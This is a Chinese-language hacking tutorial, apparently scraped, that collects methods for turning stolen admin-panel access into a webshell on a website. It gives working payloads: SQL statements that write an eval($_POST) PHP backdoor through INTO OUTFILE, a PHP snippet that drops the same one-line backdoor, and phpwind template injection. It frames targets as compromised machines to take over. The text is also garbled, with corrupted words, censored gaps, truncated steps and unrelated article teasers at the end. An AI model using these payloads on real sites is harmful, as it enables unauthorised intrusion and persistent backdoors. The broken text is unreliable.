從後台得到webshell技巧大彙總

2021-09-21 15:42:46 字數 1521 閱讀 8083

前 言 

動網上傳漏洞,相信大家拿下不少肉雞吧。可以說是動網讓upfile.asp上傳檔案過濾不嚴的漏洞昭然天下,現在這種漏洞已經基本比較難見到了,不排除一些小**仍然存在此漏洞。在拿站過程中,我們經常費了九牛兩虎之力拿到管理員帳號和密碼,並順利進入了後台,雖然此時與拿到**webshell還有一步之遙,但還是有許多新手因想不出合適的方法而被拒之門外。因此,我們把常用的從後台得到webshell的方法進行了總結和歸納,大體情況有以下十大方面。

注意:如何進入後台,不是本文討論範圍,其具體方法就不說了,靠大家去自己發揮。此文參考了前人的多方面的資料和資訊,在此一併表示感謝。

一、直接上傳獲得webshell

這種對php和jsp的一些程式比較常見,molyx board就是其中一例,直接在心情圖示管理上傳.php型別,雖然沒有提示,其實已經成功了,上傳的文 件url應該是

要複製到的位置:

。就可以暴出路徑,php環境中比較容易暴出絕對路徑:)。提一點的是遇到是mysql在win系統下路徑應該這樣寫d:\\wwwroot\\a.php。下面的方法是比較常用的乙個匯出webshell的方法,也可以寫個vbs新增系統管理員的指令碼匯出到啟動資料夾,系統重起後就會新增乙個管理員帳號

create table a(cmd text not null)

insert into a(cmd) values('<?fputs(fopen("./a.php","w"),"<?eval(\$_post[a]);?>")?>')   

select cmd from a into outfile '路徑/b.php'

drop table if exists a

訪問b.php就會生成乙個<?eval($_post[a]);?>的最小馬。

如果遇到可以執行php命令就簡單多了,典型的代表是bo-blog,在後台的php命令框輸入以下**:

<?

$sa = fopen("./up/saiy.php","w");

fw9xiaote($sa,"<?eval(\$_post[a]);?".">");

fclose($sa);

?>

就會在up目錄下生成檔名為saiy.php內容為<?eval($_post[a]);?>的最小php木馬, 

最後用lanker的客戶端來連線。實際運用中要考慮到資料夾是否有寫許可權。或者輸入這樣的**<?fputs(fopen("./a.php","w"),"<?eval(\$_post[a]);?>")?> 將會在當前目錄生成乙個a.php的最小馬。

九、phpwind論壇從後台到webshell的三種方式

方式1 模板法

進入後台, 風格模版設定 ,在隨便一行寫**,記住,這**必須頂著左邊行寫,**前面不可以有任何字元。 

eot; 

eval($a); 

p9xiaont 《附件:

從後台到webshell的一點思路

安全天使 1.asp acc mssql程式 主要是利用後台對access資料庫的 備份資料庫 或 恢復資料庫 功能,備份的資料庫路徑 等變數沒有過濾導致可以把任意檔案字尾改為asp,從而得到webshell,msssql版的程式就直接應用了access版的 導致sql版照樣可以利用。具體方法和分析...

從Webshell到肉雞

從webshell到肉雞 s.s.f simeon 我一直都在強調乙個東西,在網路 中最重要的就是思維,本文的靈感來自於安天365團隊的乙個篇稿件,在稿件中提到了乙個aspxspy的asp.net型別後門 軟體,在安全界中最近一直流行後門中的後門,即通過給出乙個包含後門的webshell程式,眾多小...

從Webshell到肉雞

從webshell到肉雞 s.s.f simeon 我一直都在強調乙個東西,在網路攻防中最重要的就是思維,本文的靈感來自於安天365團隊的乙個篇稿件,在稿件中提到了乙個aspxspy的asp.net型別後門 軟體,在安全界中最近一直流行後門中的後門,即通過給出乙個包含後門的webshell程式,眾多...